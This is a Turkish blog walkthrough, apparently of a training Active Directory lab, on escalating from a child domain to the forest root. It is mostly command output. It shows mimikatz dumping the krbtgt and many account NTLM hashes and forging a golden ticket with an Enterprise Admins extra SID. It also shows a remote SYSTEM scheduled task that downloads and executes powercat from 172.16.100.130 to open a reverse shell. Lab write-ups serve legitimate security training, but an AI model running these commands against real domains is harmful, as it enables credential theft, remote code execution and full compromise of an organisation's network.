SSK'l\u0131 bir hacker der ki "Domain Admin mi oldun? Orda seni bekleyen bir Enterprise Admin var...(de-ja-vu?)"<\/p>\n
Ge\u00e7en yaz\u0131m\u0131zda SID History'i k\u00f6t\u00fcye kullanarak Enterprise Admin haklar\u0131nda CIFS servisini kullanarak root domain'deki DC \u00fczerinde Zaten DA'iz. Bundan dolay\u0131 child domain'deki DC \u00fczerinde mimikatz arac\u0131yla bir dump i\u015flemi ger\u00e7ekle\u015ftirelim...<\/p>\n Harika bizim i\u00e7in gerekli olan ntlm:ff46a9d8bd66c6efd77603da26796f35<\/p>\n Daha sonras\u0131nda domain sids'leri alal\u0131m.<\/p>\n \u015eimdi mimikatz ile sald\u0131r\u0131m\u0131z\u0131 ba\u015flat\u0131p bir bilet olu\u015ftural\u0131m. Ama \u00f6ncesinde bir test i\u015flemi ger\u00e7ekle\u015ftirelim.<\/p>\n Evet beklendi\u011fi gibi bir hata ald\u0131k. \u015eimdi TGT olu;turalim ve RAM'e dahil edelim.<\/p>\n Harika! Kontrol i\u015flemini tekrarlayal\u0131m.<\/p>\n Yoksa bir reverse shell mi geliyor? Uzaktan bir schedule task olu\u015fturarak reverse shell alabliriz.<\/p>\n \u00d6ncelikle bir dinleme noktas\u0131 olu\u015ftural\u0131m. Burada firewall ayarlamal\u0131r\u0131n\u0131z\u0131 yapman\u0131z gerekecektir.<\/p>\n Daha sonras\u0131nda task'\u0131m\u0131z\u0131 olu\u015ftural\u0131m.<\/p>\n Ve \u015fimdi task'\u0131m\u0131z\u0131 \u00e7al\u0131\u015ft\u0131ral\u0131m.<\/p>\n Harika! Reverse Shell'imizin gelmesi gerekiyor.<\/p>\n Art\u0131k burdan sonras\u0131 size kalm\u0131\u015f...<\/p>\n","protected":false},"excerpt":{"rendered":" SSK’l\u0131 bir hacker der ki "Domain Admin mi oldun? Orda seni bekleyen bir Enterprise Admin var…(de-ja-vu?)" Ge\u00e7en yaz\u0131m\u0131zda SID History’i k\u00f6t\u00fcye kullanarak Enterprise Admin haklar\u0131nda…<\/p>\nls<\/code> komutunu \u00e7al\u0131\u015ft\u0131rmay\u0131 ba\u015farabilmi\u015ftik. \u015eimdiki hedefimiz reverse shell olacakt\u0131r. Peki bunu nas\u0131l yapaca\u011f\u0131z? Asl\u0131nda sald\u0131r\u0131 format\u0131m\u0131z ayn\u0131 sadece trust key yerine krbtgt'nin ntlm hash'ini kullanaca\u011f\u0131z. Hadi ba\u015flayal\u0131m!<\/p>\n[dcorp-dc]: PS C:\\Users\\svcadmin\\Documents> Invoke-Mimikatz -Command '"lsadump::lsa \/patch"'\n\n .#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **\n ## \/ \\ ## \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ## > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com ***\/\n\nmimikatz(powershell) # lsadump::lsa \/patch\nDomain : dcorp \/ S-1-5-21-1874506631-3219952063-538504511\n\nRID : 000001f4 (500)\nUser : Administrator\nLM :\nNTLM : af0686cc0ca8f04df42210c9ac980760\n\nRID : 000001f5 (501)\nUser : Guest\nLM :\nNTLM :\n\nRID : 000001f6 (502)\nUser : krbtgt\nLM :\nNTLM : ff46a9d8bd66c6efd77603da26796f35\n\nRID : 000001f7 (503)\nUser : DefaultAccount\nLM :\nNTLM :\n\nRID : 00000455 (1109)\nUser : ciadmin\nLM :\nNTLM : e08253add90dccf1a208523d02998c3d\n\nRID : 00000458 (1112)\nUser : sqladmin\nLM :\nNTLM : 07e8be316e3da9a042a9cb681df19bf5\n\nRID : 00000459 (1113)\nUser : websvc\nLM :\nNTLM : cc098f204c5887eaa8253e7c2749156f\n\nRID : 0000045b (1115)\nUser : srvadmin\nLM :\nNTLM : a98e18228819e8eec3dfa33cb68b0728\n\nRID : 0000045d (1117)\nUser : appadmin\nLM :\nNTLM : d549831a955fee51a43c83efb3928fa7\n\nRID : 00000461 (1121)\nUser : mgmtadmin\nLM :\nNTLM : 95e2cd7ff77379e34c6e46265e75d754\n\nRID : 00000462 (1122)\nUser : svcadmin\nLM :\nNTLM : b38ff50264b74508085d82c69794a4d8\n\nRID : 0000046b (1131)\nUser : studentadmin\nLM :\nNTLM : d1254f303421d3cdbdc4c73a5bce0201\n\nRID : 00000470 (1136)\nUser : sql1admin\nLM :\nNTLM : e999ae4bd06932620a1e78d2112138c6\n\nRID : 000004bb (1211)\nUser : testda\nLM :\nNTLM : a16452f790729fa34e8f3a08f234a82c\n\nRID : 0000b02d (45101)\nUser : Control119user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b02e (45102)\nUser : Control120user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b02f (45103)\nUser : Control121user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b030 (45104)\nUser : Control122user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b031 (45105)\nUser : Control123user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b032 (45106)\nUser : Control124user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b033 (45107)\nUser : Control125user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b034 (45108)\nUser : Control126user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b035 (45109)\nUser : Control127user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b036 (45110)\nUser : Control128user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b037 (45111)\nUser : Control129user\nLM :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID : 0000b038 (45112)\nUser : Control130user\nLM :\nNTLM : 64f12cddaa88057e06a81b54e73b949b\n\nRID : 0000b039 (45113)\nUser : Support119user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b03a (45114)\nUser : Support120user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b03b (45115)\nUser : Support121user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b03c (45116)\nUser : Support122user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b03d (45117)\nUser : Support123user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b03e (45118)\nUser : Support124user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b03f (45119)\nUser : Support125user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b040 (45120)\nUser : Support126user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b041 (45121)\nUser : Support127user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b042 (45122)\nUser : Support128user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b043 (45123)\nUser : Support129user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b044 (45124)\nUser : Support130user\nLM :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID : 0000b045 (45125)\nUser : VPN119user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b046 (45126)\nUser : VPN120user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b047 (45127)\nUser : VPN121user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b048 (45128)\nUser : VPN122user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b049 (45129)\nUser : VPN123user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b04a (45130)\nUser : VPN124user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b04b (45131)\nUser : VPN125user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b04c (45132)\nUser : VPN126user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b04d (45133)\nUser : VPN127user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b04e (45134)\nUser : VPN128user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b04f (45135)\nUser : VPN129user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b050 (45136)\nUser : VPN130user\nLM :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID : 0000b052 (45138)\nUser : student119\nLM :\nNTLM : 15fb3d37379865ee2c2ec48b2bdab4dc\n\nRID : 0000b053 (45139)\nUser : student120\nLM :\nNTLM : 3ed7cc36e236cbd7bc23ec1f590f7824\n\nRID : 0000b054 (45140)\nUser : student121\nLM :\nNTLM : f24a8075f83be221bd45b154deba0a30\n\nRID : 0000b055 (45141)\nUser : student122\nLM :\nNTLM : de8324633de5a658386a51bae7e5ee7b\n\nRID : 0000b056 (45142)\nUser : student123\nLM :\nNTLM : e46d877c7b0f351f4487af165ebc42af\n\nRID : 0000b057 (45143)\nUser : student124\nLM :\nNTLM : fa5e61c40180c65bbbbccef232fd6bcd\n\nRID : 0000b058 (45144)\nUser : student125\nLM :\nNTLM : 0c5079bb21ea06b73464f1339083422d\n\nRID : 0000b059 (45145)\nUser : student126\nLM :\nNTLM : d78f29a72849daca2d8b1e05d6b17cc3\n\nRID : 0000b05a (45146)\nUser : student127\nLM :\nNTLM : 3ec6caba66ebc57699e360fb72ba7c9a\n\nRID : 0000b05b (45147)\nUser : student128\nLM :\nNTLM : b90831875de23927f54c44824da8e373\n\nRID : 0000b05c (45148)\nUser : student129\nLM :\nNTLM : b39bfc4451c0866179f7ce03fcf8f34b\n\nRID : 0000b05d (45149)\nUser : student130\nLM :\nNTLM : c4e4d30534c8364fb7906d6f640d0b62\n\nRID : 000003e8 (1000)\nUser : DCORP-DC$\nLM :\nNTLM : 044a9b97eb7827ebd84eddb493d2e99b\n\nRID : 00000454 (1108)\nUser : DCORP-MGMT$\nLM :\nNTLM : 639c1adde3e0d1ba0d733c7d0d8f23ec\n\nRID : 00000456 (1110)\nUser : DCORP-CI$\nLM :\nNTLM : bc7c774ae1c2f9325adee16ff86681fc\n\nRID : 00000457 (1111)\nUser : DCORP-MSSQL$\nLM :\nNTLM : 5acf09c93df6805adf482810cc1a38e6\n\nRID : 0000045a (1114)\nUser : DCORP-ADMINSRV$\nLM :\nNTLM : 5e77978a734e3a7f3895fb0fdbda3b96\n\nRID : 00000468 (1128)\nUser : DCORP-APPSRV$\nLM :\nNTLM : dae2eb887cf962b2907c1273459b58e2\n\nRID : 0000046f (1135)\nUser : DCORP-SQL1$\nLM :\nNTLM : 130bb98c073825e0f4924622aa6eda7a\n\nRID : 00000865 (2149)\nUser : DCORP-STDADM$\nLM :\nNTLM : ed3005093d910e9413a7f0293df473d3\n\nRID : 0000b05e (45150)\nUser : DCORP-STD119$\nLM :\nNTLM : fa57080ed16d628893f7a54d3c2b5391\n\nRID : 0000b05f (45151)\nUser : DCORP-STD120$\nLM :\nNTLM : 4d228e9b1693fcb793575e6a9919f591\n\nRID : 0000b060 (45152)\nUser : DCORP-STD121$\nLM :\nNTLM : 2f7c3547b8eea381ac502a03a22092fb\n\nRID : 0000b061 (45153)\nUser : DCORP-STD122$\nLM :\nNTLM : 6849309385bc87fe3fcb6e4f0e2b154a\n\nRID : 0000b062 (45154)\nUser : DCORP-STD123$\nLM :\nNTLM : 6b12c7b8e0d8887fb52005da3f43b378\n\nRID : 0000b063 (45155)\nUser : DCORP-STD124$\nLM :\nNTLM : 8db7f6258bc3943c9d0f4b648f9cf455\n\nRID : 0000b064 (45156)\nUser : DCORP-STD125$\nLM :\nNTLM : d68b3bf637335b0b2ab85335cdc59e4f\n\nRID : 0000b065 (45157)\nUser : DCORP-STD126$\nLM :\nNTLM : a6a69f6bda9a3180c7e49d9eb1a5907b\n\nRID : 0000b066 (45158)\nUser : DCORP-STD127$\nLM :\nNTLM : 3a3c850c70b743d0d596610d03683ccf\n\nRID : 0000b067 (45159)\nUser : DCORP-STD128$\nLM :\nNTLM : 0fad619c814ffeb129913c769d5e36dc\n\nRID : 0000b068 (45160)\nUser : DCORP-STD129$\nLM :\nNTLM : 86008b07fdc9308a7d39fd537940dbd7\n\nRID : 0000b069 (45161)\nUser : DCORP-STD130$\nLM :\nNTLM : 275969e8e73a86af788a569c0893deb8\n\nRID : 0000044f (1103)\nUser : mcorp$\nLM :\nNTLM : fbf363baad2308075117c0fa4ba525ee\n\nRID : 00000450 (1104)\nUser : us$\nLM :\nNTLM : d86b6d4c38663e716632bd34373053b4\n\nRID : 000004bd (1213)\nUser : ecorp$\nLM :\nNTLM : 74bbc1d7f376d979dae83f0a79682516<\/code><\/pre>\nPS C:\\Windows\\system32> Import-Module C:\\AD\\PowerSploit\\Recon\\Recon.psd1\nPS C:\\Windows\\system32> Get-DomainSID\nS-1-5-21-1874506631-3219952063-538504511\nPS C:\\Windows\\system32> Get-DomainSID -Domain moneycorp.local\nS-1-5-21-280534878-1496970234-700767426<\/code><\/pre>\nPS C:\\Windows\\system32> gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local\ngwmi : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))\nAt line:1 char:1\n+ gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.lo ...\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException\n + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\n<\/code><\/pre>\nPS C:\\Windows\\system32> Invoke-Mimikatz -Command '"kerberos::golden \/user:Administrator \/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/sids:S-1-5-21-280534878-1496970234-700767426-519 \/krbtgt:ff46a9d8bd66c6efd77603da26796f35 \/ticket:C:\\\nAD\\krbtgt_tkt.kirbi"'\n\n .#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **\n ## \/ \\ ## \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ## > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com ***\/\n\nmimikatz(powershell) # kerberos::golden \/user:Administrator \/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/sids:S-1-5-21-280534878-1496970234-700767426-519 \/krbtgt:ff46a9d8bd66c6efd77603da26796f35 \/ticket:C:\\AD\\krbtgt_tkt.kirbi\nUser : Administrator\nDomain : dollarcorp.moneycorp.local (DOLLARCORP)\nSID : S-1-5-21-1874506631-3219952063-538504511\nUser Id : 500\nGroups Id : *513 512 520 518 519\nExtra SIDs: S-1-5-21-280534878-1496970234-700767426-519 ;\nServiceKey: ff46a9d8bd66c6efd77603da26796f35 - rc4_hmac_nt\nLifetime : 1\/27\/2021 12:28:00 PM ; 1\/25\/2031 12:28:00 PM ; 1\/25\/2031 12:28:00 PM\n-> Ticket : C:\\AD\\krbtgt_tkt.kirbi\n\n * PAC generated\n * PAC signed\n * EncTicketPart generated\n * EncTicketPart encrypted\n * KrbCred generated\n\nFinal Ticket Saved to file !<\/code><\/pre>\nPS C:\\Windows\\system32> Invoke-Mimikatz -Command '"kerberos::ptt C:\\AD\\krbtgt_tkt.kirbi"'\n\n .#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **\n ## \/ \\ ## \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ## > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com ***\/\n\nmimikatz(powershell) # kerberos::ptt C:\\AD\\krbtgt_tkt.kirbi\n\n* File: 'C:\\AD\\krbtgt_tkt.kirbi': OK<\/code><\/pre>\nPS C:\\Windows\\system32> gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local\n\nSystemDirectory : C:\\Windows\\system32\nOrganization :\nBuildNumber : 14393\nRegisteredUser : Windows User\nSerialNumber : 00377-80000-00000-AA867\nVersion : 10.0.14393<\/code><\/pre>\nPS C:\\Windows\\system32> Import-Module C:\\AD\\powercat.ps1\nPS C:\\Windows\\system32> powercat -l -v -p 443 -t 10000\nVERBOSE: Set Stream 1: TCP\nVERBOSE: Set Stream 2: Console\nVERBOSE: Setting up Stream 1...\nVERBOSE: Listening on [0.0.0.0] (port 443)\n<\/code><\/pre>\nPS C:\\Windows\\system32> schtasks.exe \/create \/S mcorp-dc.moneycorp.local \/SC Weekly \/RU "NT Authority\\SYSTEM" \/TN "KUDAY4REVERSE" \/TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('''http:\/\/172.16.100.130\/powercat.ps1'''); powercat -c 172.16.100.130 4\n43 -e cmd;'"\nWARNING: The task name "KUDAY4REVERSE" already exists. Do you want to replace it (Y\/N)? y\nSUCCESS: The scheduled task "KUDAY4REVERSE" has successfully been created.<\/code><\/pre>\nPS C:\\Windows\\system32> schtasks \/Run \/S mcorp-dc.moneycorp.local \/TN "KUDAY4REVERSE"\nSUCCESS: Attempted to run the scheduled task "KUDAY4REVERSE".<\/code><\/pre>\nPS C:\\Windows\\system32> powercat -l -v -p 443 -t 10000\nVERBOSE: Set Stream 1: TCP\nVERBOSE: Set Stream 2: Console\nVERBOSE: Setting up Stream 1...\nVERBOSE: Listening on [0.0.0.0] (port 443)\nVERBOSE: Connection from [172.16.1.1] port [tcp] accepted (source port 63105)\nVERBOSE: Setting up Stream 2...\nVERBOSE: Both Communication Streams Established. Redirecting Data Between Streams...\nMicrosoft Windows [Version 10.0.14393]\n(c) 2016 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>hostname\nhostname\nmcorp-dc\n\nC:\\Windows\\system32><\/code><\/pre>\n